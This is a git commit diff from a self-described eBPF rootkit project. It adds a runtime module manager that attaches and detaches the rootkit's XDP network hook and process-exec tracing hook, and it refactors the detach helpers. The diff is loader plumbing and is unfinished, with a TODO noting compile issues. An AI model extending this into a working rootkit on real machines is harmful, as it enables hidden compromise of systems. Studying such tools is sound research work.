Completed configuration module which enables to change the running ebpf modules in the rootkit at runtime. Minor changes and updated code structure

2025-12-29 20:53:09 +08:00 · 2022-01-04 13:26:13 -05:00
parent 40da6b300b
commit 74873dbca5
10 changed files with 150 additions and 40 deletions
--- a/src/user/include/modules/common.h
+++ b/src/user/include/modules/common.h
@@ -0,0 +1,15 @@
+#ifndef __MODULE_COMMON_H
+#define __MODULE_COMMON_H
+
+#include <linux/bpf.h>
+#include <bpf/libbpf.h>
+
+int detach_link_generic(struct bpf_link *link){
+    int ret = bpf_link__destroy(link);
+    if(ret!=0){
+        return -1;
+    }
+    return 0;
+}
+
+#endif
--- a/src/user/include/modules/module_manager.c
+++ b/src/user/include/modules/module_manager.c
@@ -1,12 +1,50 @@
 #include "module_manager.h"
+#include "xdp.h"
+#include "sched.h"

 module_config_t module_config = {
    .xdp_module = {
        .all = ON,
-        .xdp_receive = ON
+        .xdp_receive = OFF
    },
    .sched_module = {
        .all = ON,
-        .handle_sched_process_exec = ON
+        .handle_sched_process_exec = OFF
    }
 };
+
+module_config_attr_t module_config_attr = {
+    .skel = NULL,
+    .xdp_module = {
+        .ifindex = -1,
+        .flags = -1
+    },
+    .sched_module = {}
+};
+
+
+int setup_all_modules(){
+    //Alias
+    module_config_t config = module_config;
+    module_config_attr_t attr = module_config_attr;
+    int ret;
+
+    //XDP
+    if(config.xdp_module.all == ON){
+        ret = attach_xdp_all(attr.skel, attr.xdp_module.ifindex, attr.xdp_module.flags);
+    }else{
+        if(config.xdp_module.xdp_receive == ON) ret = attach_xdp_receive(attr.skel, attr.xdp_module.ifindex, attr.xdp_module.flags);
+    }
+    if(ret!=0) return -1;
+
+    //SCHED
+    if(config.sched_module.all == ON){
+        ret = attach_sched_all(attr.skel);
+    }else{
+        if(config.sched_module.handle_sched_process_exec == ON) ret = attach_handle_sched_process_exec(attr.skel);
+    }
+    if(ret!=0) return -1;
+
+
+    return 0;
+}
--- a/src/user/include/modules/module_manager.h
+++ b/src/user/include/modules/module_manager.h
@@ -2,11 +2,16 @@
 #define __MOD_MANAGER_H

 #include <stdint.h>
+#include <unistd.h>
+#include <linux/types.h>
+

 #define ON 1
 #define OFF 0

-//Centralized configutation struct
+//Centralized configutation struct.
+//Used by the module manager to decide which modules to load
+//If <all> is set in a module, the other configurations are ignored
 typedef struct module_config_t{
    struct xdp_module {
        char all;
@@ -20,6 +25,30 @@ typedef struct module_config_t{

 } module_config_t;

+//Configuration struct. Used by the module manager to
+//correctly attach the needed modules, providing necessary params
+typedef struct module_config_attr_t{
+    struct xdp_filter_bpf *skel;
+    struct xdp_module_attr {
+        __u32 ifindex;
+        __u32 flags;
+    } xdp_module;
+
+    struct sched_module_attr {
+        void* __empty;
+    }sched_module;
+
+} module_config_attr_t;
+
+//An unique module configutation struct and attr
 extern module_config_t module_config;
+extern module_config_attr_t module_config_attr;
+
+/**
+ * @brief Installs the ebpf modules according to the module_config
+ * 
+ * @return 0 if ok, -1 if error
+ */
+int setup_all_modules();

 #endif
--- a/src/user/include/modules/sched.h
+++ b/src/user/include/modules/sched.h
@@ -2,9 +2,15 @@
 #define __MOD_SCHED_H

 #include <linux/bpf.h>
+#include <bpf/bpf.h>
 #include <bpf/libbpf.h>
+#include "common.h"
 #include "xdp_filter.skel.h"

+//TODO RESOLVE THE FACT THAT THESE ARE NOT COMPILED WITH REFERENCE TO XDP_FILTER_BPF
+//COMPLETE CONFIG
+//CHECK EVERYTHING STILL WORKS
+
 //Connections
 int attach_handle_sched_process_exec(struct xdp_filter_bpf *skel){
    skel->links.handle_sched_process_exec = bpf_program__attach(skel->progs.handle_sched_process_exec);
@@ -17,15 +23,17 @@ int attach_sched_all(struct xdp_filter_bpf *skel){


 //Disconnections
-int detach_link_generic(struct bpf_link *link){
-    int ret = bpf_link__destroy(link);
-    if(ret!=0){
+int detach_handle_sched_process_exec(struct xdp_filter_bpf *skel){
+    int err = detach_link_generic(skel->links.handle_sched_process_exec);
+    if(err<0){
+        fprintf(stderr, "Failed to detach sched link\n");
        return -1;
    }
    return 0;
 }
+
 int detach_sched_all(struct xdp_filter_bpf *skel){
-    return detach_link_generic(skel->links.handle_sched_process_exec);
+    return detach_handle_sched_process_exec(skel);
 }


--- a/src/user/include/modules/xdp.h
+++ b/src/user/include/modules/xdp.h
@@ -1,7 +1,14 @@
 #ifndef __MOD_XDP_H
 #define __MOD_XDP_H

-int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
+#include <bpf/bpf.h>
+#include <bpf/libbpf.h>
+#include <linux/if_link.h>
+#include "common.h"
+#include <sys/resource.h>
+#include "xdp_filter.skel.h"
+
+int attach_xdp_receive(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
    //Attach BPF program to network interface
 	//New way of doing it: it allows for future addition of multiple 
 	//XDP programs attached to same interface if needed
@@ -47,14 +54,22 @@ int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
    return 0;
 }

-int detach_xdp_all(struct xdp_filter_bpf *skel){
-    int err = bpf_link__destroy(skel->links.xdp_receive);
+int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
+    return attach_xdp_receive(skel, ifindex, flags);
+}
+
+
+int detach_xdp_receive(struct xdp_filter_bpf *skel){
+    int err = detach_link_generic(skel->links.xdp_receive);
    if(err<0){
        fprintf(stderr, "Failed to detach XDP program\n");
 		return -1;
    }
-
    return 0;
 }

+int detach_xdp_all(struct xdp_filter_bpf *skel){
+    return detach_xdp_receive(skel);
+}
+
 #endif